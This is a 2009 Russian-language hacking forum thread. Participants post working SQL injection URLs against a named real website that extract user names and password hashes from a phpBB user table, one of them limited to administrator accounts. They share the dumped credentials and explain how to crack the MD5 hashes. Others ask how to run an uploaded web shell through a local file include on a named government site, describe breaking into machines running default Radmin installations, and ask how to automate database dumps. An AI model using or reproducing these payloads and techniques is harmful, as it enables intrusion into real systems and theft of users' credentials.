21.05.2009, 10:41
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами:
9095366
Репутация:
298
|
|
http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+sele ct+1,2,concat_ws(0x3a,username,user_password),4,5, 6,7+from+phpbb_users--+
|
|
|
21.05.2009, 11:59
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Подскажите плиз можно ли провести SQL-inj
Строка вида site.ru/?cat=menu'
Если оборсать строка menu'--+ то не ошибки не инфы не выводит...
А вот если menu'+ То инфа выводится как при нормальном запросе
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'menu\'='main'' at line 1
SELECT count(*)/4 as count FROM thum where cat='menu\' or 'menu\'='main'
Последний раз редактировалось Byrger; 21.05.2009 в 12:02..
|
|
|
|
21.05.2009, 13:26
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами:
9610769
Репутация:
380
|
|
Идет слеширование кавычек а без них запрос не завершит, ищи числовые данные в передоваемых скрипту значениях, зачастую они идут в запрос без кавычек, и как правило где есть одна скуля на одном сайте есть и другие.
Сообщение от AlexSatter
http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+sele ct+1,2,concat_ws(0x3a,username,user_password),4,5, 6,7+from+phpbb_users--+
для админов можно и так
http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+sele ct+1,2,group_concat(concat_ws(0x3a,username,user_p assword)+separator+'<br>'),4,5,6,7+from+phpbb_user s+where+user_level=1--+
Последний раз редактировалось PaCo; 21.05.2009 в 13:34..
|
|
|
|
21.05.2009, 14:21
|
|
Новичок
Регистрация: 02.05.2009
Сообщений: 11
С нами:
8962091
Репутация:
0
|
|
local include
залил шелл как картинку вида image.php.gif на сервер, почитал статьи понял что надо теперь проинклудить, нашел лосал инклуд вида:
Warning: include_once() [function.include]: Failed opening 'CLASS_FILE' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /home/webdev/public_html/......../class.search.php on line 2
Warning: require_once(CLASS_SESSION_ACTION) [function.require-once]
Warning: include_once(CLASS_FILE) [function.include-once]
Fatal error: require_once() [function.require]
как мне используя это запустить шелл? в примерах описал локал инклуд вида .php?id=ит.д. а у меня просто /class.search.php
|
|
|
|
21.05.2009, 15:42
|
|
Новичок
Регистрация: 02.05.2009
Сообщений: 11
С нами:
8962091
Репутация:
0
|
|
Сообщение от slammer
залил шелл как картинку вида image.php.gif на сервер, почитал статьи понял что надо теперь проинклудить, нашел лосал инклуд вида:
Warning: include_once() [function.include]: Failed opening 'CLASS_FILE' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /home/webdev/public_html/......../class.search.php on line 2
Warning: require_once(CLASS_SESSION_ACTION) [function.require-once]
Warning: include_once(CLASS_FILE) [function.include-once]
Fatal error: require_once() [function.require]
как мне используя это запустить шелл? в примерах описал локал инклуд вида .php?id=ит.д. а у меня просто /class.search.php
вот полный путь: http://www.anh.gov.co/scripts/tiny_mce/plugins/ajaxfilemanager/inc/class.search.php
|
|
|
|
21.05.2009, 15:07
|
|
Новичок
Регистрация: 17.03.2008
Сообщений: 23
С нами:
9553576
Репутация:
-2
|
|
Сообщение от PaCo
Идет слеширование кавычек а без них запрос не завершит, ищи числовые данные в передоваемых скрипту значениях, зачастую они идут в запрос без кавычек, и как правило где есть одна скуля на одном сайте есть и другие.
для админов можно и так
http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+sele ct+1,2,group_concat(concat_ws(0x3a,username,user_p assword)+separator+'<br>'),4,5,6,7+from+phpbb_user s+where+user_level=1--+
да я тоже прочитал и при таком раскладе выходит это
oxana:c4ca4238a0b923820dcc509a6f75849b
administrator:30f46374c898450c560f8c14999b7ff7-
что это означает первая часть логин а второе как расшифровать
|
|
|
|
21.05.2009, 15:13
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами:
9610769
Репутация:
380
|
|
2AET - начни что то читать, а то это не дело так, если учесть что ты еще шелл захочешь залить то тут твоих вопросов будет на 10 страниц, это md5
oxana:c4ca4238a0b923820dcc509a6f75849b - 1
то есть логин - oxana пароль 1
|
|
|
|
21.05.2009, 15:15
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
С нами:
8953743
Репутация:
59
|
|
Вторая - это md5 хеш того, что находится в колонке user_password
для расшифровки есть много сервисов, или же самостоятельно брутить с помощью скажем пассворд рековер..
|
|
|
|
21.05.2009, 16:02
|
|
Banned
Регистрация: 28.03.2008
Сообщений: 138
С нами:
9537463
Репутация:
184
|
|
Люди help plz. Я кароч насканил кучу ip нашол дефлотные радминов. и без проксей
подрубился и начал пакостить
1) У радмина v2 or v2.1 есть log где айпишники подрубившихся?
2)если я подключился к дефлотному радмину - это наказуемо (преступление)?
3)Радмин v2 or v2.1 ведёт лог что с токогото ip была запушена какянит прога?
4)Я сижу под NAT'ом с динамичким ip. ADSL
меня могут вычислить?
|
|
|
|
21.05.2009, 16:10
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами:
9116877
Репутация:
468
|
|
Всем привет.! Вопрос такой:
Юзаю SIPT 4.0
Все настроил и он оперделил принт поля.
Надо задампить бд... но как? //как настроить прогу
Нада вот так
http://......../i.php?id=.......+limit+0,1
http://......../i.php?id=.......+limit+1,1
.................................................. .......
Руками я не могу делать - много записей.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
